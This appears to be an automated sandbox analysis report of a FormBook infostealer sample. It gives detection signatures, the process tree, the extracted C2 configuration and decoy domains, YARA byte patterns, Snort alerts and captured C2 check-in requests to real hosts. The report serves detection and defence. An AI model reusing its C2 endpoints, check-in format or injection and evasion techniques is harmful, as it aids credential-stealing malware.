Loading ...

Play interactive tourEdit tour

Analysis Report s6G3ZtvHZg.exe

Overview

General Information

Sample Name:s6G3ZtvHZg.exe
Analysis ID:385308
MD5:885e567660a28ec23b692291587ef69f
SHA1:9e200dd274b4be5df241719fe72f6403938a8561
SHA256:fb23a007cf696e3c6b119c61b62824abc56b47a7e2f82337e890acc9024bd88c
Tags:exeFormbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • s6G3ZtvHZg.exe (PID: 6076 cmdline: 'C:\Users\user\Desktop\s6G3ZtvHZg.exe' MD5: 885E567660A28EC23B692291587EF69F)
    • s6G3ZtvHZg.exe (PID: 6328 cmdline: C:\Users\user\Desktop\s6G3ZtvHZg.exe MD5: 885E567660A28EC23B692291587EF69F)
    • s6G3ZtvHZg.exe (PID: 6336 cmdline: C:\Users\user\Desktop\s6G3ZtvHZg.exe MD5: 885E567660A28EC23B692291587EF69F)
      • explorer.exe (PID: 3292 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • help.exe (PID: 7084 cmdline: C:\Windows\SysWOW64\help.exe MD5: 09A715036F14D3632AD03B52D1DA6BFF)
          • cmd.exe (PID: 2888 cmdline: /c del 'C:\Users\user\Desktop\s6G3ZtvHZg.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 4456 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.okitmall.com/iu4d/"], "decoy": ["abbottdigitalhealthpass.com", "peridot.website", "emmajanetracy.com", "arewedoingenough.com", "mvprunning.com", "xn--939au40bijas7ab2a93s.com", "thehouseofchiron.com", "sqzffn.com", "moretuantired.com", "rosewoodcibubur.com", "warungjitu.com", "armylord.net", "rideequihome.com", "girasol.zone", "getboostphlo.com", "bilradioplaza.com", "japannxt.com", "figulco.com", "insershop.com", "loktantratvnews.com", "healthdatamonitoring.com", "gmopanama.com", "miguelchulia.com", "appexivo.com", "weluvweb.com", "qqcaotv.com", "aleyalifestyle.com", "aratssycosmetics.com", "chestfreezersale.xyz", "gyanumbrella.com", "betbonusuk.com", "dostforimpact.net", "lestlondon.com", "theartsutra.com", "finegiant.com", "zacharypelletier.com", "ux300e.com", "wiglous.club", "adamspartnership.com", "contex33.xyz", "appearwood.club", "3m-mat.com", "runcouver.com", "cqsjny.com", "totubemp3.net", "imagecloudhost.com", "appleadayjuice.com", "energyoutline.com", "yashaerotech.com", "mcleancosmeticgynecology.com", "georgicarealty.com", "sellbulkweed.com", "kardosystems.com", "hubsnewz.com", "ekstrafordunyasi.com", "cymentor.com", "morrealeestates.com", "mumbaihotgirls.club", "beaulaser.com", "aa29996.com", "ankaramasozlerburada.xyz", "otmcleaningservice.com", "rosaandray.com", "omxpro.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000E.00000002.505721374.0000000000A00000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000000E.00000002.505721374.0000000000A00000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000000E.00000002.505721374.0000000000A00000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166a9:$sqlite3step: 68 34 1C 7B E1
    • 0x167bc:$sqlite3step: 68 34 1C 7B E1
    • 0x166d8:$sqlite3text: 68 38 2A 90 C5
    • 0x167fd:$sqlite3text: 68 38 2A 90 C5
    • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
    0000000E.00000002.504313193.0000000000390000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      0000000E.00000002.504313193.0000000000390000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 18 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      3.2.s6G3ZtvHZg.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        3.2.s6G3ZtvHZg.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        3.2.s6G3ZtvHZg.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x166a9:$sqlite3step: 68 34 1C 7B E1
        • 0x167bc:$sqlite3step: 68 34 1C 7B E1
        • 0x166d8:$sqlite3text: 68 38 2A 90 C5
        • 0x167fd:$sqlite3text: 68 38 2A 90 C5
        • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
        3.2.s6G3ZtvHZg.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          3.2.s6G3ZtvHZg.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x13885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x13371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x13987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x858a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x125ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9302:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18977:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19a1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 0000000E.00000002.505721374.0000000000A00000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.okitmall.com/iu4d/"], "decoy": ["abbottdigitalhealthpass.com", "peridot.website", "emmajanetracy.com", "arewedoingenough.com", "mvprunning.com", "xn--939au40bijas7ab2a93s.com", "thehouseofchiron.com", "sqzffn.com", "moretuantired.com", "rosewoodcibubur.com", "warungjitu.com", "armylord.net", "rideequihome.com", "girasol.zone", "getboostphlo.com", "bilradioplaza.com", "japannxt.com", "figulco.com", "insershop.com", "loktantratvnews.com", "healthdatamonitoring.com", "gmopanama.com", "miguelchulia.com", "appexivo.com", "weluvweb.com", "qqcaotv.com", "aleyalifestyle.com", "aratssycosmetics.com", "chestfreezersale.xyz", "gyanumbrella.com", "betbonusuk.com", "dostforimpact.net", "lestlondon.com", "theartsutra.com", "finegiant.com", "zacharypelletier.com", "ux300e.com", "wiglous.club", "adamspartnership.com", "contex33.xyz", "appearwood.club", "3m-mat.com", "runcouver.com", "cqsjny.com", "totubemp3.net", "imagecloudhost.com", "appleadayjuice.com", "energyoutline.com", "yashaerotech.com", "mcleancosmeticgynecology.com", "georgicarealty.com", "sellbulkweed.com", "kardosystems.com", "hubsnewz.com", "ekstrafordunyasi.com", "cymentor.com", "morrealeestates.com", "mumbaihotgirls.club", "beaulaser.com", "aa29996.com", "ankaramasozlerburada.xyz", "otmcleaningservice.com", "rosaandray.com", "omxpro.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: s6G3ZtvHZg.exeVirustotal: Detection: 27%Perma Link
          Source: s6G3ZtvHZg.exeReversingLabs: Detection: 25%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000000E.00000002.505721374.0000000000A00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.504313193.0000000000390000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.254514103.0000000003A7A000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.293813367.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.505963948.0000000000A30000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.294200227.0000000001260000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.294175313.0000000001230000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 3.2.s6G3ZtvHZg.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.s6G3ZtvHZg.exe.400000.0.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: s6G3ZtvHZg.exeJoe Sandbox ML: detected
          Source: 3.2.s6G3ZtvHZg.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: s6G3ZtvHZg.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: s6G3ZtvHZg.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wntdll.pdbUGP source: s6G3ZtvHZg.exe, 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, help.exe, 0000000E.00000002.507433539.0000000002DA0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: s6G3ZtvHZg.exe, help.exe
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\help.exeCode function: 4x nop then pop edi

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49719 -> 104.21.7.67:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49719 -> 104.21.7.67:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49719 -> 104.21.7.67:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49721 -> 3.13.255.157:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49721 -> 3.13.255.157:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49721 -> 3.13.255.157:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49740 -> 52.58.78.16:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49740 -> 52.58.78.16:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49740 -> 52.58.78.16:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.okitmall.com/iu4d/
          Performs DNS queries to domains with low reputationShow sources
          Source: C:\Windows\explorer.exeDNS query: www.chestfreezersale.xyz
          Source: global trafficHTTP traffic detected: GET /iu4d/?uVjL=M6NHp&J6A=JOOHHYcCVAiumnatH9FSz+DjDh0K1BlAW5euFZ4O/VfuOjdNwQJji3cnAkHedg7IWrAc+UUQ6A== HTTP/1.1Host: www.emmajanetracy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /iu4d/?uVjL=M6NHp&J6A=aMD/FfTIFdO3dQr6MUn+t3qhrpMUQuV8ueOBsAqsCPdFlO5Mvx0OM51UzrMOHcRpnHSJ7V9dZA== HTTP/1.1Host: www.okitmall.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /iu4d/?J6A=t0/ehB6/LVvHYU10SpQGBhUGrinUOeav3QqKXry454rcMit/5rlSGcY6Hhw179fg+WUV7s8SGg==&uVjL=M6NHp HTTP/1.1Host: www.moretuantired.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /iu4d/?uVjL=M6NHp&J6A=FEKq/YHm5wXdiXZSfMYU5a3fJJzC9VYlasV/QaqgSPDk7XU2aTMqxEbJbT4EZiZV5QP8ot7STQ== HTTP/1.1Host: www.betbonusuk.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /iu4d/?J6A=p+YVWX5eE4Rg8cIpgLWCUqreCa5cO9ffVLN3OauOR6vO7HZOR4KqCsCqkB1fyJC1oU39P3kn3g==&uVjL=M6NHp HTTP/1.1Host: www.weluvweb.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /iu4d/?uVjL=M6NHp&J6A=k0teHmEV2/zmOBpTxqI3H5Y5oaIRcTZxO4xmkSNbfQsiDPlSSPS4pf83qXUKBn/nYITInLUVzg== HTTP/1.1Host: www.warungjitu.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /iu4d/?uVjL=M6NHp&J6A=quJ3uSLzhXOR+OCBqveBVSLwWtpx0cb154Cx1Wq/f+1xYAHW6pDvZEyzwff3Do7t5v8+AMWbMw== HTTP/1.1Host: www.appearwood.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /iu4d/?J6A=/9OusRTTk+V39FQseUb+U2Ojje2+Fc0M9rZrn6A+Wz352TzRXVRSZ625FgSAuh9Pz9OXstBPtg==&uVjL=M6NHp HTTP/1.1Host: www.theartsutra.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /iu4d/?uVjL=M6NHp&J6A=A35kX2qXHT11q/n/cs4iUbUQYnF9cz7N4ymZ2B1O+tarurGCDYOUJTJ/gp5jdduweflW0nZeQg== HTTP/1.1Host: www.chestfreezersale.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /iu4d/?uVjL=M6NHp&J6A=JOOHHYcCVAiumnatH9FSz+DjDh0K1BlAW5euFZ4O/VfuOjdNwQJji3cnAkHedg7IWrAc+UUQ6A== HTTP/1.1Host: www.emmajanetracy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 192.0.78.25 192.0.78.25
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: Joe Sandbox ViewASN Name: AUTOMATTICUS AUTOMATTICUS
          Source: global trafficHTTP traffic detected: GET /iu4d/?uVjL=M6NHp&J6A=JOOHHYcCVAiumnatH9FSz+DjDh0K1BlAW5euFZ4O/VfuOjdNwQJji3cnAkHedg7IWrAc+UUQ6A== HTTP/1.1Host: www.emmajanetracy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /iu4d/?uVjL=M6NHp&J6A=aMD/FfTIFdO3dQr6MUn+t3qhrpMUQuV8ueOBsAqsCPdFlO5Mvx0OM51UzrMOHcRpnHSJ7V9dZA== HTTP/1.1Host: www.okitmall.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /iu4d/?J6A=t0/ehB6/LVvHYU10SpQGBhUGrinUOeav3QqKXry454rcMit/5rlSGcY6Hhw179fg+WUV7s8SGg==&uVjL=M6NHp HTTP/1.1Host: www.moretuantired.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /iu4d/?uVjL=M6NHp&J6A=FEKq/YHm5wXdiXZSfMYU5a3fJJzC9VYlasV/QaqgSPDk7XU2aTMqxEbJbT4EZiZV5QP8ot7STQ== HTTP/1.1Host: www.betbonusuk.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /iu4d/?J6A=p+YVWX5eE4Rg8cIpgLWCUqreCa5cO9ffVLN3OauOR6vO7HZOR4KqCsCqkB1fyJC1oU39P3kn3g==&uVjL=M6NHp HTTP/1.1Host: www.weluvweb.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /iu4d/?uVjL=M6NHp&J6A=k0teHmEV2/zmOBpTxqI3H5Y5oaIRcTZxO4xmkSNbfQsiDPlSSPS4pf83qXUKBn/nYITInLUVzg== HTTP/1.1Host: www.warungjitu.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /iu4d/?uVjL=M6NHp&J6A=quJ3uSLzhXOR+OCBqveBVSLwWtpx0cb154Cx1Wq/f+1xYAHW6pDvZEyzwff3Do7t5v8+AMWbMw== HTTP/1.1Host: www.appearwood.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /iu4d/?J6A=/9OusRTTk+V39FQseUb+U2Ojje2+Fc0M9rZrn6A+Wz352TzRXVRSZ625FgSAuh9Pz9OXstBPtg==&uVjL=M6NHp HTTP/1.1Host: www.theartsutra.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /iu4d/?uVjL=M6NHp&J6A=A35kX2qXHT11q/n/cs4iUbUQYnF9cz7N4ymZ2B1O+tarurGCDYOUJTJ/gp5jdduweflW0nZeQg== HTTP/1.1Host: www.chestfreezersale.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /iu4d/?uVjL=M6NHp&J6A=JOOHHYcCVAiumnatH9FSz+DjDh0K1BlAW5euFZ4O/VfuOjdNwQJji3cnAkHedg7IWrAc+UUQ6A== HTTP/1.1Host: www.emmajanetracy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.emmajanetracy.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 12 Apr 2021 08:03:45 GMTServer: ApacheX-Powered-By: PHP/5.6.36X-Frame-Options: SAMEORIGINCache-Control: No-CacheConnection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 65 30 34 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6b 72 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 33 36 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 22 20 2f 3e 0a 09 09 09 09 3c 74 69 74 6c 65 3e ed 86 b5 ed 95 a9 eb b3 b4 ed 97 98 20 eb b9 84 ea b5 90 ea b2 ac ec a0 81 ec 82 ac ec 9d b4 ed 8a b8 3c 2f 74 69 74 6c 65 3e 0a 0a 09 09 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 31 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 51 75 65 72 79 2e 73 65 72 69 61 6c 69 7a 65 4f 62 6a 65 63 74 2f 32 2e 30 2e 33 2f 6a 71 75 65 72 79 2e 73 65 72 69 61 6c 69 7a 65 4f 62 6a 65 63 74 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 73 6f 6e 33 2f 33 2e 33 2e 32 2f 6a 73 6f 6e 33 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 6a 51 75 65 72 79 28 66 75 6e 63 74 69 6f 6e 28 24 29 20 7b 0a 20 20 20 20 20 20 24 66 6f 72 6d 20 3d 20 24 28 27 2e 70 75 72 65 2d 66 6f 72 6d 27 29 3b 0a 20 20 20 20 20 20 24 66 6f 72 6d 2e 73 75 62 6d 69 74 28 66 75 6e 63 74 69 6f 6e 28 65 29 20 7b 0a 20 20 20 20 20 20 20 20 76 61 72 20 24 74 68 69 73 20 3d 20 24 28 74 68 69 73 29 3b 0a 0a 09 09 76 61 72 20 66 20 3d 20 74 68 69 73 3b 0a 0a 09 09 69 66 20 28 66 2e 61 67 72 65 65 2e 63 68 65 63 6b 65 64 20 3d 3d 20 66 61 6c 73 65 29 0a 09 09 09 7b 0a 09 09 09 09 61 6c 65 72 74 28 27 ea b0 9c ec 9d b8 ec a0 95 eb b3 b4 ec b7 a8 ea b8 89 eb b0 a9 ec b9 a8 ec 97 90 20 eb 8f 99 ec 9d 98 ed 95 b4 20 ec a3 bc ec 84 b8 ec 9a 94 2e 27 29 3b 0a 09 09 09 09 66 2e 61 67 72 65 65 2e 66 6f 63 75 73 28 29 3b 0a 09 09 09 09 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 0a 09 09 09 7d 0a 0a 09 09 09 09 69 66 20 28 66 2e 63 75 73 74 6f 6d 65 72 5f 6e 61 6d 65 2e 76 61 6c 75 65 20 3d 3d 20 22 22 29 0a 09 09 09 7b 0a 09 09 09 0
          Source: s6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: s6G3ZtvHZg.exe, 00000000.00000002.252345146.00000000028D1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: s6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000004.00000000.272051627.0000000006840000.00000004.00000001.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: s6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: s6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: s6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: s6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: s6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: s6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: s6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: s6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
